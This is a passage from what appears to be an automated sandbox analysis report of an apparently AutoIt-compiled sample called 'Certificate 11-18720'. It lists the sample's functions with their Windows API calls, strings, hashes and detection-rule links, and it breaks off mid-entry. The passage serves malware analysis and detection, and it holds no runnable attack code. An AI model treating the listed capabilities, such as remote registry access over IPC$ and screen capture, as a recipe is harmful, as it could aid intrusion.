                                                                                    • API String ID: 34673085-438819550
                                                                                    • Opcode ID: 9264345e8c2048588146fe96ce2a0fd94af741f23a030105797be0f1efc80276
                                                                                    • Instruction ID: c4b986720dca2033a6d371e2b31bbcb769e6bc2e937ddb308ac2acd55d717b3f
                                                                                    • Opcode Fuzzy Hash: 9264345e8c2048588146fe96ce2a0fd94af741f23a030105797be0f1efc80276
                                                                                    • Instruction Fuzzy Hash: E0818F715043419FEF64DF64C8459EAB7EABBC9304F18482EF889C7251EAB0DDC58B92
                                                                                    Function 0062EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0062EF3B
                                                                                    • GetFocus.USER32 ref: 0062EF4B
                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0062EF56
                                                                                    • _memset.LIBCMT ref: 0062F081
                                                                                    • GetMenuItemInfoW.USER32 ref: 0062F0AC
                                                                                    • GetMenuItemCount.USER32(00000000), ref: 0062F0CC
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0062F0DF
                                                                                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0062F113
                                                                                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0062F15B
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0062F193
                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0062F1C8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1296962147-4108050209
                                                                                    • Opcode ID: f07ef08570897906d8ab806a8040b9bbff4b044f97be01f625ed36f2d3169a83
                                                                                    • Instruction ID: d7dc0a27fe183962a71e9d05f4e0ce44c2ff6cd3c22355bb422eb7c626fea5e4
                                                                                    • Opcode Fuzzy Hash: f07ef08570897906d8ab806a8040b9bbff4b044f97be01f625ed36f2d3169a83
                                                                                    • Instruction Fuzzy Hash: 3E818A70504721AFD720CF14E988AABBBEAFB89314F00453EF99897291D731D815CF92
                                                                                    Function 005FA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005FABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 005FABD7
                                                                                      • Part of subcall function 005FABBB: GetLastError.KERNEL32(?,005FA69F,?,?,?), ref: 005FABE1
                                                                                      • Part of subcall function 005FABBB: GetProcessHeap.KERNEL32(00000008,?,?,005FA69F,?,?,?), ref: 005FABF0
                                                                                      • Part of subcall function 005FABBB: HeapAlloc.KERNEL32(00000000,?,005FA69F,?,?,?), ref: 005FABF7
                                                                                      • Part of subcall function 005FABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 005FAC0E
                                                                                      • Part of subcall function 005FAC56: GetProcessHeap.KERNEL32(00000008,005FA6B5,00000000,00000000,?,005FA6B5,?), ref: 005FAC62
                                                                                      • Part of subcall function 005FAC56: HeapAlloc.KERNEL32(00000000,?,005FA6B5,?), ref: 005FAC69
                                                                                      • Part of subcall function 005FAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,005FA6B5,?), ref: 005FAC7A
                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 005FA8CB
                                                                                    • _memset.LIBCMT ref: 005FA8E0
                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 005FA8FF
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 005FA910
                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 005FA94D
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005FA969
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 005FA986
                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 005FA995
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 005FA99C
                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 005FA9BD
                                                                                    • CopySid.ADVAPI32(00000000), ref: 005FA9C4
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 005FA9F5
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 005FAA1B
                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 005FAA2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3996160137-0
                                                                                    • Opcode ID: d5dc5391d3d1af0830337ad0865a35a17f537ab8131d0520af79f6b276a3decc
                                                                                    • Instruction ID: e985dd0fdf94af758979c23abcb9e53addf2cc35008774dc8028a6bc46f6e08f
                                                                                    • Opcode Fuzzy Hash: d5dc5391d3d1af0830337ad0865a35a17f537ab8131d0520af79f6b276a3decc
                                                                                    • Instruction Fuzzy Hash: 3B515DB590020AAFDF11DF90DD45AFEBBBAFF05300F048129FA55A7290D7399A05CB62
                                                                                    Function 00619DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 00619E36
                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00619E42
                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00619E4E
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00619E5B
                                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00619EAF
                                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00619EEB
                                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00619F0F
                                                                                    • SelectObject.GDI32(00000006,?), ref: 00619F17
                                                                                    • DeleteObject.GDI32(?), ref: 00619F20
                                                                                    • DeleteDC.GDI32(00000006), ref: 00619F27
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00619F32
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                    • String ID: (
                                                                                    • API String ID: 2598888154-3887548279
                                                                                    • Opcode ID: b8fb07f59171c892291fcff14b50f5cb477f66d6e04f65ea24950f75454d144c
                                                                                    • Instruction ID: e19f110caaa2f7619f13d17415df2c70f7445787c28b7ea659267d28eb6b04ae
                                                                                    • Opcode Fuzzy Hash: b8fb07f59171c892291fcff14b50f5cb477f66d6e04f65ea24950f75454d144c
                                                                                    • Instruction Fuzzy Hash: 07512975900309AFCB15CFA8D885EEEBBBAEF49710F14841DF95A97350D731A941CBA0
                                                                                    Function 0060CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString__swprintf_wprintf
                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                    • API String ID: 2889450990-2391861430
                                                                                    • Opcode ID: c361465ea80afe77def5d3a4023f59612c9235588fd888898c7511013f6cbad1
                                                                                    • Instruction ID: 66144f7efd3d6e4cb3181cde8f13860df887b0883c884a786a6c45cbe0c94268
                                                                                    • Opcode Fuzzy Hash: c361465ea80afe77def5d3a4023f59612c9235588fd888898c7511013f6cbad1
                                                                                    • Instruction Fuzzy Hash: F3516F3180011ABECB19EBE0CD4AEEEBB7ABF45304F104169F505761A2EB316F59DB61
                                                                                    Function 0060CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString__swprintf_wprintf
                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                    • API String ID: 2889450990-3420473620
                                                                                    • Opcode ID: ecf7260fc882ec43f2655e42dbea48f331583f54d3042824962bf4c750f6b04f
                                                                                    • Instruction ID: c2c035351dbdc709cb0183635ef99a3a2f355d43114f99a4b445980dbdd6a3dc
                                                                                    • Opcode Fuzzy Hash: ecf7260fc882ec43f2655e42dbea48f331583f54d3042824962bf4c750f6b04f
                                                                                    • Instruction Fuzzy Hash: EA51707194010AAEDB19EBE0CD4AEEEBB79BF44300F504169F50972192EB306F99DB61
                                                                                    Function 00623C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00622BB5,?,?), ref: 00623C1D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID: $Eg$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                    • API String ID: 3964851224-1334267600
                                                                                    • Opcode ID: 131c8a3d43678bac6308c4aafa94137bff4a10f1ffecd175a70c04de5c6fb4b3
                                                                                    • Instruction ID: 9e748f20baf657744002478695692495f1d46be2adeeb97226dfce1d8ebe3868
                                                                                    • Opcode Fuzzy Hash: 131c8a3d43678bac6308c4aafa94137bff4a10f1ffecd175a70c04de5c6fb4b3
                                                                                    • Instruction Fuzzy Hash: 13411E3411066A8BDF10EF14E955AEA3B67FF92340F50485AEC591B3A2EF749E0ACF50
                                                                                    Function 006055BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 006055D7
                                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00605664
                                                                                    • GetMenuItemCount.USER32(00681708), ref: 006056ED
                                                                                    • DeleteMenu.USER32(00681708,00000005,00000000,000000F5,?,?), ref: 0060577D
                                                                                    • DeleteMenu.USER32(00681708,00000004,00000000), ref: 00605785
                                                                                    • DeleteMenu.USER32(00681708,00000006,00000000), ref: 0060578D
                                                                                    • DeleteMenu.USER32(00681708,00000003,00000000), ref: 00605795
                                                                                    • GetMenuItemCount.USER32(00681708), ref: 0060579D
                                                                                    • SetMenuItemInfoW.USER32(00681708,00000004,00000000,00000030), ref: 006057D3
                                                                                    • GetCursorPos.USER32(?), ref: 006057DD
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 006057E6
                                                                                    • TrackPopupMenuEx.USER32(00681708,00000000,?,00000000,00000000,00000000), ref: 006057F9
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00605805
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3993528054-0
                                                                                    • Opcode ID: cd92d136ec8e8d1e6d03d71073c3125921c1b8b984a40718549c4f36cf2296c2
                                                                                    • Instruction ID: 0acbf545e2f2fd457322c92702d9968974eda6e58db10e66e568fd6cf1854739
                                                                                    • Opcode Fuzzy Hash: cd92d136ec8e8d1e6d03d71073c3125921c1b8b984a40718549c4f36cf2296c2
                                                                                    • Instruction Fuzzy Hash: B271F470680615BEEB289B54CC49FEBBF6AFB01364F244205F6166A2E1CBB25850DF64
                                                                                    Function 005FA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 005FA1DC
                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005FA211
                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005FA22D
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005FA249
                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 005FA273
                                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 005FA29B
                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005FA2A6
                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005FA2AB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                    • API String ID: 1687751970-22481851
                                                                                    • Opcode ID: 0f2aad1ddb261b4977c767bac078e7747750ca5657dc47dbd615c4af7483c2fa
                                                                                    • Instruction ID: 99b4bfcc72e7ed8c9497461a8781f8e6d3e226fcef86a2aa1a62d4358c34c80b
                                                                                    • Opcode Fuzzy Hash: 0f2aad1ddb261b4977c767bac078e7747750ca5657dc47dbd615c4af7483c2fa
                                                                                    • Instruction Fuzzy Hash: 7F410576C1022EAEDB21EBE4DC99EEDBBB9FF44700F054029E905A3160EB349E05CB51
                                                                                    Function 006067E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __swprintf.LIBCMT ref: 006067FD
                                                                                    • __swprintf.LIBCMT ref: 0060680A
                                                                                      • Part of subcall function 005E172B: __woutput_l.LIBCMT ref: 005E1784
                                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00606834
                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00606840
                                                                                    • LockResource.KERNEL32(00000000), ref: 0060684D
                                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0060686D
                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 0060687F
                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0060688E
                                                                                    • LockResource.KERNEL32(?), ref: 0060689A
                                                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 006068F9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                    • String ID: 5g
                                                                                    • API String ID: 1433390588-2513871569
                                                                                    • Opcode ID: 2229d985358c747f485754d171df7e8c1dba202cca9dcc63135d4bc6a56de666
                                                                                    • Instruction ID: ddedafbc45cf14db335bc9ac68ad323b92130a9b4826882d28aabfb195299bbf
                                                                                    • Opcode Fuzzy Hash: 2229d985358c747f485754d171df7e8c1dba202cca9dcc63135d4bc6a56de666
                                                                                    • Instruction Fuzzy Hash: 8B31AEB594021AABDB089F60DC48AFF7BAEFF09340F008425F912D6280E774DA21DB70
                                                                                    Function 006025B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006336F4,00000010,?,Bad directive syntax error,0065DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 006025D6
                                                                                    • LoadStringW.USER32(00000000,?,006336F4,00000010), ref: 006025DD
                                                                                    • _wprintf.LIBCMT ref: 00602610
                                                                                    • __swprintf.LIBCMT ref: 00602632
                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 006026A1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                    • API String ID: 1080873982-4153970271
                                                                                    • Opcode ID: b1c388327111aa679b28f598c496526adb81a5ac467ba795b2a4fb710a3ef60f
                                                                                    • Instruction ID: 67926492d144e1053c0d9f6aeda594b7d4ea2bf61edbbc42e1dda751d48d41a5
                                                                                    • Opcode Fuzzy Hash: b1c388327111aa679b28f598c496526adb81a5ac467ba795b2a4fb710a3ef60f
                                                                                    • Instruction Fuzzy Hash: 02216B3180022BAFCF15ABD0CC0EFEE7F3ABF18304F044459F559661A2EA71AA58DB50
                                                                                    Function 00607AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00607B42
                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00607B58
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00607B69
                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00607B7B
                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00607B8C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: SendString
                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                    • API String ID: 890592661-1007645807
                                                                                    • Opcode ID: e73c53abf3163142bfead2735279beb13835ab8ec439ce4da643c7f27c0f7842
                                                                                    • Instruction ID: 72cb48ffe9436f282878cd8dfbc1140cdb4fca1c465d332822ec272db2a1913d
                                                                                    • Opcode Fuzzy Hash: e73c53abf3163142bfead2735279beb13835ab8ec439ce4da643c7f27c0f7842
                                                                                    • Instruction Fuzzy Hash: 8411B2A0A9026A7DD728B7A1CC4EEFF7EBDEBD1B00F00041DB415A61C1EEA05A45C5B0
                                                                                    Function 0060778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • timeGetTime.WINMM ref: 00607794
                                                                                      • Part of subcall function 005DDC38: timeGetTime.WINMM(?,75C0B400,006358AB), ref: 005DDC3C
                                                                                    • Sleep.KERNEL32(0000000A), ref: 006077C0
                                                                                    • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 006077E4
                                                                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00607806
                                                                                    • SetActiveWindow.USER32 ref: 00607825
                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00607833
                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00607852
                                                                                    • Sleep.KERNEL32(000000FA), ref: 0060785D
                                                                                    • IsWindow.USER32 ref: 00607869
                                                                                    • EndDialog.USER32(00000000), ref: 0060787A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                    • String ID: BUTTON
                                                                                    • API String ID: 1194449130-3405671355
                                                                                    • Opcode ID: fd44fd37dd8604800ead5c0440e2b0900453406d404fffab4c70d6927d50ce11
                                                                                    • Instruction ID: 00221e518efa7b2c1c90f2e0de2d71330a839c74e372b18bcb3f16dc9cf1ccaf
